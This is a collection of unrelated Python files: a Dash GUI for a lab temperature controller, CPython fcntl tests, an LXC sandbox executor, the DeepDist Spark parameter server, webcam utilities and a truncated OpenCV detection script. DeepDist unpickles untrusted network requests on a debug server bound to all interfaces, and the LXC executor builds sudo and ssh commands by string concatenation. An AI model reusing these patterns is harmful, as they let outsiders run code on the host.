gui.py
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 11 09:47:49 2019

@author: JOANRR
"""
import datetime
import dash
import dash_core_components as dcc
import dash_html_components as html
import dash_daq as daq
from dash.dependencies import Input, Output, State
from pyInstruments.pid import TemperatureController
from threading import Thread
from collections import deque
from visa import ResourceManager
import getopt
import sys

global N_CLICK_PREVIOUS, MAX_LENGTH
N_CLICK_PREVIOUS = 0
MAX_LENGTH = 500

# Listing the available resources
lresources = ResourceManager().list_resources()

# Initialize the pid task
p = TemperatureController()

# Preparing the plot
plot_layout = dict(margin={'l': 60, 'r': 60, 'b': 60, 't': 20},
                   legend={'x': 0, 'y': 1, 'xanchor': 'left'},
                   xaxis=dict(title="Timestamp", font=dict(size=24)),
                   yaxis=dict(title="Temperature (°C)", font=dict(size=24)))

# Maps the start button's click count to an on/off status:
# even counts yield True, odd counts yield False.
calc_status = lambda x: bool(abs(int((1j**x).real)))

external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']

app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
app.title = 'PID'

app.layout = html.Div(children=[
    html.Div(className='row', children=[
        html.Div(className='column left', children=[
            daq.Indicator(id='my-daq-indicator',
                          value=True,
                          color="#FF6633",
                          # className="two columns",
                          size=25,
                          style={'width': '50px', 'display': 'inline-block', 'vertical-align': 'middle'}
                          ),
            html.H4('Temperature stage PID setup',
                    style={'display': 'inline-block', 'vertical-align': 'middle'}),
            dcc.Graph(id='live-update-graph', figure={"layout": plot_layout}),
            dcc.Interval(
                id='interval-component',
                interval=1000,  # in milliseconds
                n_intervals=0,
                disabled=True
            ),
            html.Span('Multimeter address:'),
            dcc.Dropdown(id='dropdown-multimeter',
                         options=[{'label': name, 'value': name} for name in lresources],
                         value='GPIB0::23::INSTR' if 'GPIB0::23::INSTR' in lresources else None,
                         placeholder='Multimeter address',
                         style={'width': '80%', 'min-width': '150px'},
                         searchable=False
                         ),
            html.Span('Power source address:'),
            dcc.Dropdown(id='dropdown-sourcemeter',
                         options=[{'label': name, 'value': name} for name in lresources],
                         value='GPIB0::5::INSTR' if 'GPIB0::5::INSTR' in lresources else None,
                         placeholder='Sourcemeter address',
                         style={'width': '80%', 'min-width': '150px'},
                         searchable=False
                         )
        ]),
        html.Div(className='column middle', children=[
            daq.PowerButton(
                id='power-button',
                on=None,
                color="#FF5E5E",
            ),
            daq.StopButton(id='my-daq-startbutton',
                           buttonText='Start',
                           n_clicks=0,
                           ),
            daq.StopButton(id='my-daq-clearbutton',
                           n_clicks=0,
                           buttonText='Clear',
                           ),
            daq.StopButton(id='refresh-button',
                           n_clicks=0,
                           buttonText='Refresh',
                           ),
            html.P(['Sensor type:',
                    dcc.RadioItems(
                        id='rtd-type',
                        options=[
                            {'label': 'Pt100', 'value': 100},
                            {'label': 'Pt1000', 'value': 1000}
                        ],
                        value=100
                    ),
                    daq.BooleanSwitch(
                        id='cooling-switch',
                        label='Cooling?',
                        on=False,
                        disabled=True,
                    ),
                    daq.NumericInput(
                        id='max-power',
                        label='Max. action (V)',
                        min=0.0,
                        max=21.00,
                        value=5.00,
                    )
                    ]),
        ]),
        html.Div(className='column right', children=[
            html.Div([
                html.P(id='label-setpoint', children='Temperature setpoint is 20.00 °C'),
                dcc.Input(
                    id='set-setpoint',
                    type='number',
                    min=0, max=100,
                    value=20.00,
                    debounce=True,
                    size='10'
                ),
                html.Br(),
                html.Br(),
                html.P('Current temperature (°C)'),
                daq.LEDDisplay(
                    id='my-curent-T',
                    labelPosition='top',
                    value=f'{0.00:05.2f}',
                    color="#FF5E5E",
                ),
            ], style={'padding-top': '25px', 'text-align': 'center'})
        ]),
    ])
])


# Multiple components can update every time the interval gets fired.
@app.callback([Output('live-update-graph', 'figure'),
               Output('my-curent-T', 'value')],
              [Input('interval-component', 'n_intervals'),
               Input('my-daq-clearbutton', 'n_clicks')],
              [State('live-update-graph', 'figure')])
def update_graph_live(n, n_clear, figure):
    # Determine which component triggered the callback
    ctx = dash.callback_context
    if not ctx.triggered:
        button_id = 'No clicks yet'
    else:
        button_id = ctx.triggered[0]['prop_id'].split('.')[0]

    if button_id == 'interval-component':
        tstamp = datetime.datetime.now()  # .strftime("%d-%m-%YT %H:%M:%S.%f")
        x = deque(figure['data'][0]['x'], MAX_LENGTH)
        y = deque(figure['data'][0]['y'], MAX_LENGTH)
        y2 = deque(figure['data'][1]['y'], MAX_LENGTH)
        x.append(tstamp)
        y.append(p.current_T)
        y2.append(p.setpoint)
    elif button_id == 'my-daq-clearbutton':
        print('Clearing')
        x = []
        y = []
        y2 = []
    else:
        x = y = y2 = []

    figure['data'] = [{
        'x': list(x),
        'y': list(y),
        'name': 'Current T',
        'mode': 'lines+markers',
        'type': 'scatter'
    }, {
        'x': list(x),
        'y': list(y2),
        'name': 'Setpoint T',
        'mode': 'lines+markers',
        'type': 'scatter'
    }]

    if len(x) == 0:
        Tstring = '00.00'
    else:
        Tstring = '{0:05.2f}'.format(y[-1])

    return figure, Tstring


@app.callback([Output('my-daq-startbutton', 'buttonText'),
               Output('my-daq-indicator', 'color'),
               Output('interval-component', 'disabled')],
              [Input('my-daq-startbutton', 'n_clicks')],
              prevent_initial_call=True)
def start_measurement(N):
    color = ["#00cc96", '#FF6633']
    label = 'Start'
    status = calc_status(N + 1)
    try:
        if status is True:
            print('INFO: Instrument started...')
            p.pid_on()
            # Run the controller loop in a background thread
            t = Thread(target=p.run)
            t.daemon = True
            t.start()
            label = 'Stop'
        elif status is False:
            print('INFO: Instrument configured and ready!')
            p.pid_off()
            label = 'Start'
        else:
            pass
        return label, color[int(not status)], not status
    except Exception as e:
        print('ERROR: An error occurred in starting the instrument')
        print(e)
        return label, color[1], True


@app.callback([Output('label-setpoint', 'children')],
              [Input('set-setpoint', 'value')])
def write_setpoint(value):
    p.setpoint = value
    label = f'Temperature setpoint is {p.setpoint:5.2f} °C'
    return [label]


@app.callback([Output('my-daq-startbutton', 'disabled'),
               Output('my-daq-startbutton', 'n_clicks'),
               Output('cooling-switch', 'disabled')],
              [Input('power-button', 'on')],
              [State('my-daq-startbutton', 'n_clicks'),
               State('set-setpoint', 'value'),
               State('cooling-switch', 'on'),
               State('max-power', 'value'),
               State('dropdown-multimeter', 'value'),
               State('dropdown-sourcemeter', 'value'),
               State('rtd-type', 'value')])
def start_instrument(on, N, setpoint, cooling, max_power, mult_addr, source_addr, R0):
    """The cooling flag needs to be negated, as TemperatureController.configurate()
    asks whether the stage is HEATING, i.e. just the opposite."""
    if on is None:
        return True, 0, False
    try:
        if on:
            p.configurate(setpoint, not cooling, max_power, mult_addr, source_addr, R0)
            return False, N, True
        else:
            return True, 0, False
    except Exception as e:
        print('ERROR: An error occurred in starting the instrument')
        print(e)
        return True, 0, False


@app.callback([Output('max-power', 'label')],
              [Input('max-power', 'value')])
def max_power(value):
    p.max_poutput = value
    label = 'Max. action (V)'
    return [label]


@app.callback([Output('dropdown-multimeter', 'value'),
               Output('dropdown-multimeter', 'options'),
               Output('dropdown-sourcemeter', 'value'),
               Output('dropdown-sourcemeter', 'options')],
              [Input('refresh-button', 'n_clicks')])
def refresh_resources(n):
    list_of_resources = ResourceManager().list_resources()
    default_resources = [s for s in list_of_resources if 'GPIB' in s]
    if len(default_resources) > 1:
        sourcemeter_resource = default_resources[0]
        multimeter_resource = default_resources[1]
    else:
        sourcemeter_resource = None
        multimeter_resource = None
    options = [{'label': name, 'value': name} for name in list_of_resources]
    return multimeter_resource, options, sourcemeter_resource, options


if __name__ == '__main__':
    # Default values
    debug = True
    port = 8052
    user_reloader = False

    argv = sys.argv[1:]
    try:
        # Long options take an argument, hence the trailing '='
        options, args = getopt.getopt(argv, "p:d:r:",
                                      ["port=", "debug=", "user_reloader="])
        for name, value in options:
            if name in ['-d', '--debug']:
                debug = value.lower() in ['true', '1']
            elif name in ['-p', '--port']:
                port = value
            elif name in ['-r', '--user_reloader']:
                user_reloader = value.lower() in ['true', '1']
        app.run_server(debug=debug, port=port, use_reloader=user_reloader)
    except KeyboardInterrupt:
        print("Program terminated.")
    except Exception as e:
        print(e)
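
Usage sketch (not part of gui.py): a minimal, hypothetical launcher showing how the CLI flags parsed by the __main__ block above would be forwarded; the port value is just an example.

# Hypothetical launcher for the dashboard above; flags mirror gui.py's getopt handling.
import subprocess
import sys

subprocess.run([sys.executable, 'gui.py',
                '-p', '8052',    # port passed to app.run_server()
                '-d', 'true',    # debug mode
                '-r', 'false'])  # use_reloader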
test_fcntl.py
"""Test program for the fcntl C module. """ import platform import os import struct import sys import unittest from multiprocessing import Process from test.support import (verbose, TESTFN, unlink, import_module, cpython_only) # Skip test if no fcntl module. fcntl = import_module('fcntl') def get_lockdata(): try: os.O_LARGEFILE except AttributeError: start_len = "ll" else: start_len = "qq" if (sys.platform.startswith(('netbsd', 'freebsd', 'openbsd')) or sys.platform == 'darwin'): if struct.calcsize('l') == 8: off_t = 'l' pid_t = 'i' else: off_t = 'lxxxx' pid_t = 'l' lockdata = struct.pack(off_t + off_t + pid_t + 'hh', 0, 0, 0, fcntl.F_WRLCK, 0) elif sys.platform.startswith('gnukfreebsd'): lockdata = struct.pack('qqihhi', 0, 0, 0, fcntl.F_WRLCK, 0, 0) elif sys.platform in ['hp-uxB', 'unixware7']: lockdata = struct.pack('hhlllii', fcntl.F_WRLCK, 0, 0, 0, 0, 0, 0) else: lockdata = struct.pack('hh'+start_len+'hh', fcntl.F_WRLCK, 0, 0, 0, 0, 0) if lockdata: if verbose: print('struct.pack: ', repr(lockdata)) return lockdata lockdata = get_lockdata() class BadFile: def __init__(self, fn): self.fn = fn def fileno(self): return self.fn def try_lockf_on_other_process_fail(fname, cmd): f = open(fname, 'wb+') try: fcntl.lockf(f, cmd) except BlockingIOError: pass finally: f.close() def try_lockf_on_other_process(fname, cmd): f = open(fname, 'wb+') fcntl.lockf(f, cmd) fcntl.lockf(f, fcntl.LOCK_UN) f.close() class TestFcntl(unittest.TestCase): def setUp(self): self.f = None def tearDown(self): if self.f and not self.f.closed: self.f.close() unlink(TESTFN) def test_fcntl_fileno(self): # the example from the library docs self.f = open(TESTFN, 'wb') rv = fcntl.fcntl(self.f.fileno(), fcntl.F_SETFL, os.O_NONBLOCK) if verbose: print('Status from fcntl with O_NONBLOCK: ', rv) rv = fcntl.fcntl(self.f.fileno(), fcntl.F_SETLKW, lockdata) if verbose: print('String from fcntl with F_SETLKW: ', repr(rv)) self.f.close() def test_fcntl_file_descriptor(self): # again, but pass the file rather than numeric descriptor self.f = open(TESTFN, 'wb') rv = fcntl.fcntl(self.f, fcntl.F_SETFL, os.O_NONBLOCK) if verbose: print('Status from fcntl with O_NONBLOCK: ', rv) rv = fcntl.fcntl(self.f, fcntl.F_SETLKW, lockdata) if verbose: print('String from fcntl with F_SETLKW: ', repr(rv)) self.f.close() def test_fcntl_bad_file(self): with self.assertRaises(ValueError): fcntl.fcntl(-1, fcntl.F_SETFL, os.O_NONBLOCK) with self.assertRaises(ValueError): fcntl.fcntl(BadFile(-1), fcntl.F_SETFL, os.O_NONBLOCK) with self.assertRaises(TypeError): fcntl.fcntl('spam', fcntl.F_SETFL, os.O_NONBLOCK) with self.assertRaises(TypeError): fcntl.fcntl(BadFile('spam'), fcntl.F_SETFL, os.O_NONBLOCK) @cpython_only def test_fcntl_bad_file_overflow(self): from _testcapi import INT_MAX, INT_MIN # Issue 15989 with self.assertRaises(OverflowError): fcntl.fcntl(INT_MAX + 1, fcntl.F_SETFL, os.O_NONBLOCK) with self.assertRaises(OverflowError): fcntl.fcntl(BadFile(INT_MAX + 1), fcntl.F_SETFL, os.O_NONBLOCK) with self.assertRaises(OverflowError): fcntl.fcntl(INT_MIN - 1, fcntl.F_SETFL, os.O_NONBLOCK) with self.assertRaises(OverflowError): fcntl.fcntl(BadFile(INT_MIN - 1), fcntl.F_SETFL, os.O_NONBLOCK) @unittest.skipIf( platform.machine().startswith('arm') and platform.system() == 'Linux', "ARM Linux returns EINVAL for F_NOTIFY DN_MULTISHOT") def test_fcntl_64_bit(self): # Issue #1309352: fcntl shouldn't fail when the third arg fits in a # C 'long' but not in a C 'int'. 
try: cmd = fcntl.F_NOTIFY # This flag is larger than 2**31 in 64-bit builds flags = fcntl.DN_MULTISHOT except AttributeError: self.skipTest("F_NOTIFY or DN_MULTISHOT unavailable") fd = os.open(os.path.dirname(os.path.abspath(TESTFN)), os.O_RDONLY) try: fcntl.fcntl(fd, cmd, flags) finally: os.close(fd) def test_flock(self): # Solaris needs readable file for shared lock self.f = open(TESTFN, 'wb+') fileno = self.f.fileno() fcntl.flock(fileno, fcntl.LOCK_SH) fcntl.flock(fileno, fcntl.LOCK_UN) fcntl.flock(self.f, fcntl.LOCK_SH | fcntl.LOCK_NB) fcntl.flock(self.f, fcntl.LOCK_UN) fcntl.flock(fileno, fcntl.LOCK_EX) fcntl.flock(fileno, fcntl.LOCK_UN) self.assertRaises(ValueError, fcntl.flock, -1, fcntl.LOCK_SH) self.assertRaises(TypeError, fcntl.flock, 'spam', fcntl.LOCK_SH) @unittest.skipIf(platform.system() == "AIX", "AIX returns PermissionError") def test_lockf_exclusive(self): self.f = open(TESTFN, 'wb+') cmd = fcntl.LOCK_EX | fcntl.LOCK_NB fcntl.lockf(self.f, cmd) p = Process(target=try_lockf_on_other_process_fail, args=(TESTFN, cmd)) p.start() p.join() fcntl.lockf(self.f, fcntl.LOCK_UN) self.assertEqual(p.exitcode, 0) @unittest.skipIf(platform.system() == "AIX", "AIX returns PermissionError") def test_lockf_share(self): self.f = open(TESTFN, 'wb+') cmd = fcntl.LOCK_SH | fcntl.LOCK_NB fcntl.lockf(self.f, cmd) p = Process(target=try_lockf_on_other_process, args=(TESTFN, cmd)) p.start() p.join() fcntl.lockf(self.f, fcntl.LOCK_UN) self.assertEqual(p.exitcode, 0) @cpython_only def test_flock_overflow(self): import _testcapi self.assertRaises(OverflowError, fcntl.flock, _testcapi.INT_MAX+1, fcntl.LOCK_SH) @unittest.skipIf(sys.platform != 'darwin', "F_GETPATH is only available on macos") def test_fcntl_f_getpath(self): self.f = open(TESTFN, 'wb') expected = os.path.abspath(TESTFN).encode('utf-8') res = fcntl.fcntl(self.f.fileno(), fcntl.F_GETPATH, bytes(len(expected))) self.assertEqual(expected, res) if __name__ == '__main__': unittest.main()
lxc_executor.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import logging
import time
from threading import Thread

from vmchecker.generic_executor import Host, VM

_logger = logging.getLogger('vm_executor')


class LXCHost(Host):
    def getVM(self, bundle_dir, sb_cfg):
        return LXCVM(self, bundle_dir, sb_cfg)


class LXCVM(VM):
    def __init__(self, host, bundle_dir, sb_cfg):
        VM.__init__(self, host, bundle_dir, sb_cfg)
        self.hostname = self.machinecfg.get_vm_path()

    def executeCommand(self, cmd):
        # Run the command inside the container over SSH
        return self.host.executeCommand("ssh " + self.username + "@" + self.hostname + " " + cmd)

    def start(self):
        self.host.executeCommand("sudo lxc-start -n " + self.hostname + " -d")
        while True:
            if self.hasStarted():
                return

    def stop(self):
        self.host.executeCommand("sudo lxc-stop -n " + self.hostname)

    def hasStarted(self):
        # Poll once per second until both lxc-info and an SSH echo succeed
        time.sleep(1)
        o = self.host.executeCommand("sudo lxc-info -n " + self.hostname)
        print "not started"  # debug output, printed on every poll
        if "-1" in o:
            return False
        if "refused" in self.executeCommand('echo hello'):
            return False
        return True

    def revert(self, number=None):
        '''
        TODO:
        1. replace hardcoded paths with configurable options
        2. provide a way for starting multiple containers at the same time
        '''
        if number is None:
            number = 1
        self.host.executeCommand("sudo lxc-stop -n " + self.hostname)
        self.host.executeCommand("sudo lxc-restore " + self.hostname + " " + str(number))

    def copyTo(self, sourceDir, targetDir, files):
        """ Copy files from host(source) to guest(target) """
        for f in files:
            host_path = os.path.join(sourceDir, f)
            guest_path = os.path.join(targetDir, f)
            #guest_path = "/var/lib/lxc/"+self.hostname+"/rootfs"+guest_path
            if not os.path.exists(host_path):
                _logger.error('host file (to send) "%s" does not exist' % host_path)
                return
            _logger.info('copy file %s from host to guest at %s' % (host_path, guest_path))
            #self.host.executeCommand("sudo cp %s %s" % (host_path, guest_path))
            self.host.executeCommand("scp -r " + host_path + " " + self.username + "@" + self.hostname + ":" + guest_path)

    def copyFrom(self, sourceDir, targetDir, files):
        """ Copy files from guest(source) to host(target) """
        for f in files:
            host_path = os.path.join(targetDir, f)
            guest_path = os.path.join(sourceDir, f)
            #guest_path = "/var/lib/lxc/"+self.hostname+"/rootfs"+guest_path
            _logger.info('copy file %s from guest to host at %s' % (guest_path, host_path))
            #self.host.executeCommand("sudo cp %s %s" % (guest_path, host_path))
            self.host.executeCommand("scp -r " + self.username + "@" + self.hostname + ":" + guest_path + " " + host_path)
            if not os.path.exists(host_path):
                _logger.error('host file (received) "%s" does not exist' % host_path)

    def run(self, shell, executable_file, timeout):
        self.executeCommand("chmod +x " + executable_file)
        _logger.info('executing on the remote: prog=%s args=[%s] timeout=%d' %
                     (shell, executable_file, timeout))
        thd = Thread(target=self.executeCommand, args=(executable_file,))
        thd.start()
        if timeout is None:
            thd.join()
        else:
            thd.join(timeout)
        return thd.isAlive()
deepdist.py
"""Lightning-Fast Deep Learning on Spark
"""
import copy
import cPickle as pickle
from multiprocessing import Process
from rwlock import RWLock
import socket
import sys
from threading import Thread
import time
import urllib2
import urlparse


class DeepDist:
    def __init__(self, model, master='127.0.0.1:5000',
                 min_updates=0, max_updates=4096):
        """DeepDist - Distributed deep learning.

        :param model: provide a model that can be trained in parallel
               on the workers
        """
        self.model = model
        self.lock = RWLock()
        self.descent = lambda model, gradient: model
        self.master = master
        self.state = 'serving'
        self.served = 0
        self.received = 0
        #self.server = None
        self.pmodel = None
        self.min_updates = min_updates
        self.max_updates = max_updates

    def __enter__(self):
        Thread(target=self.start).start()
        # self.server = Process(target=self.start)
        # self.server.start()
        return self

    def __exit__(self, type, value, traceback):
        # self.server.terminate()
        pass  # need to shut down server here

    def start(self):
        from flask import Flask, request

        app = Flask(__name__)

        @app.route('/')
        def index():
            return 'DeepDist'

        @app.route('/model', methods=['GET', 'POST', 'PUT'])
        def model_flask():
            # Block while updates are being applied or the serve budget is spent
            i = 0
            while (self.state != 'serving' or self.served >= self.max_updates) and (i < 1000):
                time.sleep(1)
                i += 1

            # pickle on first read
            pmodel = None
            self.lock.acquire_read()
            if not self.pmodel:
                self.lock.release()
                self.lock.acquire_write()
                if not self.pmodel:
                    self.pmodel = pickle.dumps(self.model, -1)
                self.served += 1
                pmodel = self.pmodel
                self.lock.release()
            else:
                self.served += 1
                pmodel = self.pmodel
                self.lock.release()
            return pmodel

        @app.route('/update', methods=['GET', 'POST', 'PUT'])
        def update_flask():
            gradient = pickle.loads(request.data)

            self.lock.acquire_write()
            if self.min_updates <= self.served:
                self.state = 'receiving'  # stop serving the model while updates are applied
            self.received += 1

            self.descent(self.model, gradient)

            if self.received >= self.served and self.min_updates <= self.received:
                self.received = 0
                self.served = 0
                self.state = 'serving'
                self.pmodel = None

            self.lock.release()
            return 'OK'

        print 'Listening to 0.0.0.0:5000...'
        app.run(host='0.0.0.0', debug=True, threaded=True, use_reloader=False)

    def train(self, rdd, gradient, descent):
        master = self.master   # will be pickled
        if master is None:
            master = rdd.ctx._conf.get('spark.master')
        if master.startswith('local['):
            master = 'localhost:5000'
        else:
            if master.startswith('spark://'):
                master = '%s:5000' % urlparse.urlparse(master).netloc.split(':')[0]
            else:
                master = '%s:5000' % master.split(':')[0]
        print '\n*** Master: %s\n' % master

        self.descent = descent

        def mapPartitions(data):
            return [send_gradient(gradient(fetch_model(master=master), data),
                                  master=master)]

        return rdd.mapPartitions(mapPartitions).collect()


def fetch_model(master='localhost:5000'):
    request = urllib2.Request('http://%s/model' % master,
                              headers={'Content-Type': 'application/deepdist'})
    return pickle.loads(urllib2.urlopen(request).read())


def send_gradient(gradient, master='localhost:5000'):
    if not gradient:
        return 'EMPTY'
    request = urllib2.Request('http://%s/update' % master,
                              pickle.dumps(gradient, -1),
                              headers={'Content-Type': 'application/deepdist'})
    return urllib2.urlopen(request).read()
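
Usage sketch (not part of deepdist.py): a hedged sketch of the context-manager pattern the class exposes; the model and the gradient/descent callables are hypothetical stand-ins, and only pyspark plus this module are assumed.

# Hypothetical end-to-end sketch: any picklable model works; gradient() runs on
# the workers against each partition, descent() mutates the model on the master.
from pyspark import SparkContext
from deepdist import DeepDist

sc = SparkContext(appName='deepdist-sketch')
data = sc.parallelize(range(1000), 8)

model = {'w': 0.0}                       # stand-in model

def gradient(model, data):               # executed on the workers
    return sum(data)

def descent(model, gradient):            # executed on the master
    model['w'] -= 0.001 * gradient

with DeepDist(model) as dd:              # starts the Flask parameter server
    dd.train(data, gradient, descent)

print model['w']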
app_utils.py
# From http://www.pyimagesearch.com/2015/12/21/increasing-webcam-fps-with-python-and-opencv/

import struct
import six
import collections
import cv2
import datetime
from threading import Thread
from matplotlib import colors


class FPS:
    def __init__(self):
        # store the start time, end time, and total number of frames
        # that were examined between the start and end intervals
        self._start = None
        self._end = None
        self._numFrames = 0

    def start(self):
        # start the timer
        self._start = datetime.datetime.now()
        return self

    def stop(self):
        # stop the timer
        self._end = datetime.datetime.now()

    def update(self):
        # increment the total number of frames examined during the
        # start and end intervals
        self._numFrames += 1

    def elapsed(self):
        # return the total number of seconds between the start and
        # end interval
        return (self._end - self._start).total_seconds()

    def fps(self):
        # compute the (approximate) frames per second
        return self._numFrames / self.elapsed()


class WebcamVideoStream:
    def __init__(self, src, width, height):
        # initialize the video camera stream and read the first frame
        # from the stream
        self.stream = cv2.VideoCapture(src)
        self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
        self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
        (self.grabbed, self.frame) = self.stream.read()

        # initialize the variable used to indicate if the thread should
        # be stopped
        self.stopped = False

    def start(self):
        # start the thread to read frames from the video stream
        Thread(target=self.update, args=()).start()
        return self

    def update(self):
        # keep looping infinitely until the thread is stopped
        while True:
            # if the thread indicator variable is set, stop the thread
            if self.stopped:
                return

            # otherwise, read the next frame from the stream
            (self.grabbed, self.frame) = self.stream.read()

    def read(self):
        # return the frame most recently read
        return self.frame

    def stop(self):
        # indicate that the thread should be stopped
        self.stopped = True


def standard_colors():
    colors = [
        'AliceBlue', 'Chartreuse', 'Aqua', 'Aquamarine', 'Azure', 'Beige',
        'Bisque', 'BlanchedAlmond', 'BlueViolet', 'BurlyWood', 'CadetBlue',
        'AntiqueWhite', 'Chocolate', 'Coral', 'CornflowerBlue', 'Cornsilk',
        'Crimson', 'Cyan', 'DarkCyan', 'DarkGoldenRod', 'DarkGrey', 'DarkKhaki',
        'DarkOrange', 'DarkOrchid', 'DarkSalmon', 'DarkSeaGreen', 'DarkTurquoise',
        'DarkViolet', 'DeepPink', 'DeepSkyBlue', 'DodgerBlue', 'FireBrick',
        'FloralWhite', 'ForestGreen', 'Fuchsia', 'Gainsboro', 'GhostWhite',
        'Gold', 'GoldenRod', 'Salmon', 'Tan', 'HoneyDew', 'HotPink', 'IndianRed',
        'Ivory', 'Khaki', 'Lavender', 'LavenderBlush', 'LawnGreen', 'LemonChiffon',
        'LightBlue', 'LightCoral', 'LightCyan', 'LightGoldenRodYellow', 'LightGray',
        'LightGrey', 'LightGreen', 'LightPink', 'LightSalmon', 'LightSeaGreen',
        'LightSkyBlue', 'LightSlateGray', 'LightSlateGrey', 'LightSteelBlue',
        'LightYellow', 'Lime', 'LimeGreen', 'Linen', 'Magenta', 'MediumAquaMarine',
        'MediumOrchid', 'MediumPurple', 'MediumSeaGreen', 'MediumSlateBlue',
        'MediumSpringGreen', 'MediumTurquoise', 'MediumVioletRed', 'MintCream',
        'MistyRose', 'Moccasin', 'NavajoWhite', 'OldLace', 'Olive', 'OliveDrab',
        'Orange', 'OrangeRed', 'Orchid', 'PaleGoldenRod', 'PaleGreen',
        'PaleTurquoise', 'PaleVioletRed', 'PapayaWhip', 'PeachPuff', 'Peru',
        'Pink', 'Plum', 'PowderBlue', 'Purple', 'Red', 'RosyBrown', 'RoyalBlue',
        'SaddleBrown', 'Green', 'SandyBrown', 'SeaGreen', 'SeaShell', 'Sienna',
        'Silver', 'SkyBlue', 'SlateBlue', 'SlateGray', 'SlateGrey', 'Snow',
        'SpringGreen', 'SteelBlue', 'GreenYellow', 'Teal', 'Thistle', 'Tomato',
        'Turquoise', 'Violet', 'Wheat', 'White', 'WhiteSmoke', 'Yellow',
        'YellowGreen'
    ]
    return colors


def color_name_to_rgb():
    colors_rgb = []
    for key, value in colors.cnames.items():
        colors_rgb.append((key, struct.unpack('BBB', bytes.fromhex(value.replace('#', '')))))
    return dict(colors_rgb)


def draw_boxes_and_labels(
        boxes,
        classes,
        scores,
        category_index,
        instance_masks=None,
        keypoints=None,
        max_boxes_to_draw=5,
        min_score_thresh=.8,
        agnostic_mode=False):
    # With the defaults above, at most 5 boxes are returned and a box needs a
    # score of at least 80% (min_score_thresh=.8) to be kept.
    """Returns boxes coordinates, class names and colors

    Args:
      boxes: a numpy array of shape [N, 4]
      classes: a numpy array of shape [N]
      scores: a numpy array of shape [N] or None. If scores=None, then
        this function assumes that the boxes to be plotted are groundtruth
        boxes and plot all boxes as black with no classes or scores.
      category_index: a dict containing category dictionaries (each holding
        category index `id` and category name `name`) keyed by category indices.
      instance_masks: a numpy array of shape [N, image_height, image_width],
        can be None
      keypoints: a numpy array of shape [N, num_keypoints, 2], can be None
      max_boxes_to_draw: maximum number of boxes to visualize. If None, draw
        all boxes.
      min_score_thresh: minimum score threshold for a box to be visualized
      agnostic_mode: boolean (default: False) controlling whether to evaluate in
        class-agnostic mode or not. This mode will display scores but ignore
        classes.
    """
    # Create a display string (and color) for every box location, group any boxes
    # that correspond to the same location.
    box_to_display_str_map = collections.defaultdict(list)
    box_to_color_map = collections.defaultdict(str)
    box_to_instance_masks_map = {}
    box_to_keypoints_map = collections.defaultdict(list)
    if not max_boxes_to_draw:
        max_boxes_to_draw = boxes.shape[0]
    for i in range(min(max_boxes_to_draw, boxes.shape[0])):
        if scores is None or scores[i] > min_score_thresh:
            box = tuple(boxes[i].tolist())
            if instance_masks is not None:
                box_to_instance_masks_map[box] = instance_masks[i]
            if keypoints is not None:
                box_to_keypoints_map[box].extend(keypoints[i])
            if scores is None:
                box_to_color_map[box] = 'black'
            else:
                if not agnostic_mode:
                    if classes[i] in category_index.keys():
                        class_name = category_index[classes[i]]['name']
                    else:
                        class_name = 'N/A'
                    display_str = '{}: {}%'.format(class_name, int(100 * scores[i]))
                else:
                    display_str = 'score: {}%'.format(int(100 * scores[i]))
                box_to_display_str_map[box].append(display_str)
                if agnostic_mode:
                    box_to_color_map[box] = 'DarkOrange'
                else:
                    box_to_color_map[box] = standard_colors()[
                        classes[i] % len(standard_colors())]

    # Store all the coordinates of the boxes, class names and colors
    color_rgb = color_name_to_rgb()
    rect_points = []
    class_names = []
    class_colors = []
    for box, color in six.iteritems(box_to_color_map):
        ymin, xmin, ymax, xmax = box
        rect_points.append(dict(ymin=ymin, xmin=xmin, ymax=ymax, xmax=xmax))
        class_names.append(box_to_display_str_map[box])
        class_colors.append(color_rgb[color.lower()])
    return rect_points, class_names, class_colors
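
Usage sketch (not part of app_utils.py): the threaded-capture pattern these two classes implement, following the pyimagesearch post cited at the top; camera index 0 and the 100-frame sample are arbitrary example values.

# Read frames from a background thread and benchmark the loop rate.
stream = WebcamVideoStream(src=0, width=640, height=480).start()
fps = FPS().start()

for _ in range(100):          # arbitrary number of frames to sample
    frame = stream.read()     # returns the most recent frame, never blocks
    fps.update()

fps.stop()
stream.stop()
print('elapsed: {:.2f}s  approx. FPS: {:.2f}'.format(fps.elapsed(), fps.fps()))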
v5.py
#C1949699
# from asyncio.windows_events import NULL
import numpy as np
import argparse
import random
import time
import cv2
from cv2 import imshow
from cv2 import waitKey
import os
from multiprocessing import Process

confsThr = 0.4
boxThr = 0.45

# Loading in rcnn mask model
net = cv2.dnn.readNetFromTensorflow("dnn\\frozen_inference_graph_coco.pb",
                                    "dnn\\mask_rcnn_inception_v2_coco_2018_01_28.pbtxt")
# Loading in bounding box model
net2 = cv2.dnn_DetectionModel("frozen_inference_graph.pb",
                              "ssd_mobilenet_v3_large_coco_2020_01_14.pbtxt")
net2.setInputSize(320, 320)
net2.setInputScale(1.0/127.5)
net2.setInputMean((127.5, 127.5, 127.5))
net2.setInputSwapRB(True)


# load our input image and grab its spatial dimensions
def find_optimal_lines(ogSlice, numb):
    # attempts to find the best parameters to use for the canny edge detector,
    # using the fraction of white (edge) pixels as a compactness measure
    temp = ogSlice.copy()
    temp = cv2.GaussianBlur(ogSlice, (13, 13), cv2.BORDER_CONSTANT)
    # ogSlice = cv2.Canny(ogSlice,125,150)
    temp = cv2.Canny(temp, 100, 175)
    size = np.size(temp)
    whiteCount = np.count_nonzero(temp)
    compactness = (whiteCount/size)*100
    # while (compactness < 6 or compactness > 9):
    if compactness < 3:
        temp = ogSlice.copy()
        temp = cv2.GaussianBlur(ogSlice, (5, 5), cv2.BORDER_CONSTANT)
        temp = cv2.Canny(temp, 100, 175)
        size = np.size(temp)
        whiteCount = np.count_nonzero(temp)
        compactness = (whiteCount/size)*100
    if compactness < 3.5:
        temp = ogSlice.copy()
        temp = cv2.GaussianBlur(ogSlice, (5, 5), cv2.BORDER_CONSTANT)
        # threshold
        temp = cv2.Canny(temp, 100, 175)
        size = np.size(temp)
        whiteCount = np.count_nonzero(temp)
        compactness = (whiteCount/size)*100
    if compactness > 8:
        temp = ogSlice.copy()
        temp = cv2.GaussianBlur(ogSlice, (7, 7), cv2.BORDER_REFLECT)
        temp = cv2.Canny(temp, 100, 175)
        size = np.size(temp)
        whiteCount = np.count_nonzero(temp)
